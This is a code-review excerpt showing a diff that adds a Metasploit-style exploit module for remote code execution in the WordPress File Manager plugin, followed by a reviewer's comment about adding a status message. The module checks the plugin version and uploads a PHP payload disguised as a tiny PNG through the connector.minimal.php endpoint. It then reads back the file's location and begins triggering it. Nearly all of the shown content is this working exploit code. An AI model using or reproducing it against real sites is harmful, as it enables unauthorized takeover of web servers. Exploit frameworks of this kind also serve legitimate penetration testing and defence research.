modules/exploits/multi/http/wp_file_manager_rce.rb

```diff
@@ -0,0 +1,132 @@
+      changelog_info = res.body.split('== Changelog ==')[1].split("\n")[2]
+      if /(\d\.\d)/ =~ changelog_info
+        version = Gem::Version.new(Regexp.last_match(1))
+        print_status("#{peer} - Detected WordPress File Manager version #{version}")
+        # versions above 6.8 are patched and versions below 6.0 are not vulnerable
+        unless (version < Gem::Version.new('6.0')) || (version > Gem::Version.new('6.8'))
+          return Exploit::CheckCode::Vulnerable
+        end
+      end
+
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    begin
+      unless [CheckCode::Vulnerable].include? check
+        fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
+      end
+
+      # the smallest PNG I found was 51 bytes: https://github.com/mathiasbynens/small/blob/master/png-truncated.png
+      smallest_png_possible = '89504e470d0a1a0a0000000d49484452000000010000000108060000001f15c4890000000a49444154789c6300010000050001'
+      # prep for exploit, it will create a randomly named .php file under TARGETURI/lib/files/
+      boundary = "------------------------#{Rex::Text.rand_text_hex(16)}"
+      post_data = "#{boundary}\r\n"
+      post_data << "Content-Disposition: form-data; name=\"cmd\"\r\n\r\n"
+      post_data << "upload\r\n"
+      post_data << "#{boundary}\r\n"
+      post_data << "Content-Disposition: form-data; name=\"target\"\r\n\r\n"
+      post_data << "l1_Lw\r\n"
+      post_data << "#{boundary}\r\n"
+      post_data << "Content-Disposition: form-data; name=\"upload[]\"; filename=\"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n"
+      post_data << "Content-Type: image/png\r\n\r\n"
+      post_data << Array(smallest_png_possible).pack('H*')
+      post_data << "#{payload.encode}\r\n"
+      post_data << "#{boundary}--\r\n"
+
+      # the boundary in the Content-Type has 2 less hyphens than the others (!)
+      # it actually has to be that way to work (!)
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'lib/php/connector.minimal.php'),
+        'method' => 'POST',
+        'ctype' => "multipart/form-data; boundary=#{boundary[2..-1]}",
+        'headers' => {
+          'Accept' => '*/*',
+          'Accept-Encoding' => 'gzip, deflate',
+          'Connection' => 'close',
+          'Expect' => '100-continue'
+        },
+        'data' => post_data
+      )
+
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+      # the result body contains the path of the uploaded payload
+      result_body = res.get_json_document
+      payload_uri = result_body['added'][0]['url'].split('../')[1]
+      vprint_status("#{peer} - Payload is at #{normalize_uri(target_uri.path, "lib/#{payload_uri}")}")
+      # execute the payload
+      send_request_cgi(
```

Comment:
I typically like a print statement before this to say you are triggering it. if it fails, for whatever reason, the last thing the user saw was the location, and while they could trigger it themselves, theyd be left wondering if it was supposed to be automatically triggered or not.